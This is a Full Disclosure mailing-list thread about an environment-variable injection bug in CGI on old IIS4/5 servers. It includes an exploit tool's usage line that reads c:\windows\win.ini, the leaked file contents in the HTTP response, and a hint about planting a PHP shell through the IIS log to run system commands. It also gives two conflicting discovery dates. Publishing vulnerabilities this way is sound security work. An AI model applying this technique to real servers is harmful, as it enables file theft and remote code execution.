So, for you who doesn't read Chinese, here's the brief idea of the original post.
It is a bug affecting IIS4/5 using CGI on Windows NT/2000. Microsoft is aware of it and won't fix it. The discovery of the bug was back in year 2011. By exploiting this bug, the attacker can set arbitrary environment variables for the CGI process on the target machine, which can be further exploited to get sensitive information, or cause remote code execution. 2014-04-10 10:25 GMT+08:00 yuange <yuange1...@hotmail.com>: > Discovered in 2000 for IIS4\IIS5 0day. > > > > .php -> php.exe > > the exploit file ver 4.1.1 . > > http://seclists.org/fulldisclosure/2012/Apr/13 > > usage: > iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED > c:\windows\win.ini > > yuan can get the file c:\windows\win.ini > > > HTTP/1.1 200 OK > Server: Microsoft-IIS/5.0 > Date: Thu, 10 Apr 2014 02:11:37 GMT > Connection: close > X-Powered-By: PHP/4.0.0 > Content-type: text/html > > ; for 16-bit app support > [fonts] > [extensions] > [mci extensions] > [files] > [Mail] > MAPI=1 > [MCI Extensions.BAK] > asf=MPEGVideo > asx=MPEGVideo > ivf=MPEGVideo > m3u=MPEGVideo > mp2v=MPEGVideo > mp3=MPEGVideo > mpv2=MPEGVideo > wax=MPEGVideo > wm=MPEGVideo > wma=MPEGVideo > wmv=MPEGVideo > wvx=MPEGVideo > [SciCalc] > layout=0 > > > You can use the IIS log file write phpshell, execute the PHP call system > cmd. > > > > > > > > > > Date: Wed, 9 Apr 2014 23:11:28 +0300 > > From: kirils.solovj...@kirils.com > > To: yuange1...@hotmail.com > > Subject: Re: [FD] iis cgi 0day > > > > Sorry, I don't read Chinese. > > How is this a 0day? > > > > -- > > Kirils Solovjovs > > > _______________________________________________ > Sent through the Full Disclosure mailing list > http://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
